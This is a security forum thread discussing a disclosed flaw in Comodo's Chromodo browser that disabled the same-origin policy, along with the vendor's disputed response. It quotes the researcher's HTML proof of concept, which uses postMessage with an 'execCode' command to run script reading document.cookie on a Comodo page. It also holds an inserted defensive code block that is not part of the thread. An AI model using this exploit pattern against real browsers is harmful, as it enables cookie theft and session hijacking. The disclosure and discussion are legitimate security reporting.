Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security


Azure

Not the first time Comodo has been in the controversial spotlight for weakening a user's web security. Remember PrivDog?
Personally, I think Comodo should focus on strengthening their firewall software instead of wasting time on browsers that they might eventually abandon (not update them for a long time, or stop development on them entirely).

I would like to know what our Comodo experts think of the situation. But I can imagine some of them saying something like "Meh. Nothing new. It's just Comodo being Comodo."

Deleted member 178

I would like to know what our Comodo experts think of the situation. But I can imagine some of them saying something like "Meh. Nothing new. It's just Comodo being Comodo."

Exactly :D

More seriously, Comodo tries to get attention, but fails poorly at it; CIS goes down with each new version, keeping the same bugs/flaws across versions (and adding new ones) just so they don't have to hear "we told you so" :rolleyes:

I was a big fan until v5, then Comodo decided to listen to fanboys by adding more and more features that weren't especially needed. Sometimes I try a new release but get more and more disappointed every time...
 

woomera

When you install Comodo Internet Security, by default a new browser called Chromodo is installed and set as the default browser. Additionally, all shortcuts are replaced with Chromodo links and all settings, cookies, etc. are imported from Chrome. They also hijack DNS settings, among other shady practices.

Chromodo Internet Browser

Chromodo is described as "highest levels of speed, security and privacy", but actually disables all web security. Let me repeat that, they ***disable the same origin policy***.... ?!?..

To reproduce, do something like this:


<html>
<head></head>
<body>
<script>
function steal_cookie(obj)
{
    // Wait for the page to load
    setTimeout(function() {
        obj.postMessage(JSON.stringify({
            command: "execCode",
            code: "alert(document.cookie)",
        }), "*");
    }, 2000);
}
</script>
<a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a>
</body>
</html>


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Comodo Internet Security Installs New Browser by Force, Disables All Web Security

Issue 704 - google-security-research - Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security. - Google Security Research - Google Project Hosting
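A hardened receiver for the kind of cross-window message the PoC above sends, as an added example (not code from the bug report or from Comodo): it allowlists the sender origin, accepts only a fixed table of named commands, and never evaluates caller-supplied code. The trusted origin, the command names and the constructed hostile message are assumptions for illustration.

```javascript
// Added example, not from the bug report or Comodo's code base. A message
// receiver that a page could register for window "message" events, written
// so that the PoC's {command: "execCode", code: ...} request is refused.
// The trusted origin and the command table are assumptions for illustration.

const TRUSTED_ORIGINS = new Set(["https://ssl.comodo.com"]); // assumed allowlist

// Every command is a fixed function; there is deliberately no command that
// takes code from the sender, because dropping only the "execCode" name (the
// fix the reporter calls incorrect) leaves any other code-running command open.
const COMMANDS = {
  ping: () => "pong",
  getVersion: () => "1.0.0-example",
};

// event mirrors the fields of a MessageEvent that matter here: origin and data.
function safeDispatch(event) {
  // 1. Trust the sender's origin, never the message body, to decide access.
  if (typeof event.origin !== "string" || !TRUSTED_ORIGINS.has(event.origin)) {
    return { ok: false, reason: "untrusted origin" };
  }
  // 2. Parse defensively; malformed data is rejected, not thrown.
  let msg;
  try {
    msg = JSON.parse(event.data);
  } catch (e) {
    return { ok: false, reason: "bad json" };
  }
  // 3. Only own properties of the table count, so "toString" etc. are not commands.
  if (!msg || typeof msg.command !== "string" ||
      !Object.prototype.hasOwnProperty.call(COMMANDS, msg.command)) {
    return { ok: false, reason: "unknown command" };
  }
  return { ok: true, result: COMMANDS[msg.command]() };
}

// Constructed message in the shape the PoC above sends, from a hostile origin.
const POC_MESSAGE = {
  origin: "https://attacker.example",
  data: JSON.stringify({ command: "execCode", code: "alert(document.cookie)" }),
};

// In a browser, register the handler and reply only to the verified origin.
if (typeof window !== "undefined") {
  window.addEventListener("message", (e) => {
    const r = safeDispatch(e);
    if (r.ok) e.source.postMessage(JSON.stringify(r), e.origin);
  });
}
```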

Deleted Member 333v73x

Pathetic, if you just want Comodo Internet Security or Comodo Firewall, you actually get:

Comodo Internet Security or Comodo Firewall
Comodo DNS
Chromodo
GeekBuddy
If a threat is detected GeekBuddy pops up!!!!
 

Enju

It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit.

This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue.
Aka "security through stupidity"! I'm eagerly anticipating the results for CIS, if this Chromodo disaster is a sign of things to come it will be a fallout for them. :D
 

DracusNarcrym

While I agree with every accusation about COMODO's Chromium browsers, and that COMODO should focus on the development of their main line of products (CIS/CFW, etc.), I must say that, as far as I know, the installation of Chromodo/GeekBuddy/COMODO SecureDNS is NOT forced during the main product installation (e.g. CIS).
The user only needs to choose the custom installation option in the installer and uncheck the option to install any unneeded products/services (like you would with any application, actually).
I have installed CIS/CFW on countless machines (physical and virtual) and not once was Chromodo installed, as I had chosen not to install it during installation.

If a threat is detected GeekBuddy pops up!!!!
Indeed, that is a rather annoying nagscreen which you can turn off only after CAV has made its first detection (it would seem that there is no option to directly disable it in COMODO's settings, rather only through the nagscreen).
Moreover, it is not related to whether GeekBuddy is installed or not: even if GeekBuddy is not installed, the nagscreen will still pop up on first malware detection (even if it's an obvious false positive).
I recommend CIS users download the EICAR test file or something so that CAV detects it and produces the nagscreen, thus allowing users to turn it off.

Kate_L

in memoriam
I've lost hope for Comodo; it was my favorite product since V2. Now, I don't trust them anymore and I don't like the "shady behavior". I will change it in 1-2 weeks (I need to finish some testing to see what will replace CIS). The sad part is that not only Comodo has some "shady behavior", there are more :(
 

jamescv7

Comodo is indeed reputable for their products, which are efficient and provide strong protection; however, their problem lies in how to prevent bugs or create a stronger mechanism to avoid numerous loopholes.

They tend not to prioritize, but instead to produce a new version, with a late response to fixing bugs.

In the case of Chromodo, either it was not detected by those developers or likely not clearly reported; but if the scenario goes the same as with their other products, then there is no surprise regarding their reputation.
 

vivid

"Comodo "Chromodo" Browser disables same origin policy [...]" - News / Announcements / Feedback - CD

CEO's response:

A JS code introduced by non-Comodo code has caused this issue.
We have removed it and will do a release shortly.
We regret that Google did not follow its own responsible disclosure guideline and put users at risk by releasing this publicly, against their policy of 90 days.

We always care for our users and users come first.

We welcome the extra attention from google since we launched Which Ad Blocker world's most comprehensive adblocking initiative that includes an Android ad blocker (http://www.amazon.com/COMODO-Security-Solution-Ad-Blocker/dp/B01ATW7NC6 )

We invite google, in the interest of user's security, to follow its own published guidelines for responsible disclosure.


******************************
Here is the note about Google's responsible disclosure guideline, at the foot of the initial bug report, posted 21st Jan... Of course it has not been 90 days since 21st Jan.

Issue 704 - google-security-research - Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security. - Google Security Research - Google Project Hosting

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Deleted Member 333v73x

I've lost hope for Comodo, It was my favorite product since V2. Now, I don't trust them anymore and I don't like the "shady behavior". I will change it in 1-2 weeks (I need to finish some testing to see what will replace CIS). The sad part is that not only Comodo has some "shady behavior", there are more :(
Sorry for off-topic - best choices: Avira, Avast, AVG, Qihoo 360 Total Security, F-Secure, ESET, Norton...

Enju

we regret that Google did not follow its own responsible disclosure guideline and put users at risks by releasing this publicly, against their policy of 90 days.
They apparently love lying...
It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit.

This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue.

Issue 704 - google-security-research - Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security. - Google Security Research - Google Project Hosting
A JS code introduced by non-Comodo code has caused this issue. We have removed it and will do a release shortly.
What does that even mean? It's their own project and their "own" codebase, if it wasn't their own code it wouldn't be in the software and since no other Chromium based browser was affected by this I assume they are lying through their teeth. :rolleyes:

vivid

Let's not be too harsh on any vendor, and judge in a correct manner from a user's perspective. It is obvious that they should have waited. Why?
(1) The reporter realized that it is not a proper fix.
(2) It is clear that Comodo did not mark it as fixed.
The reported issue (generally) may refer to multiple steps of replication and/or multiple issues. You cannot assume it is fixed if your test fails. It translates into more testing to properly fix the issue (emphasis: one issue).

That is just my understanding.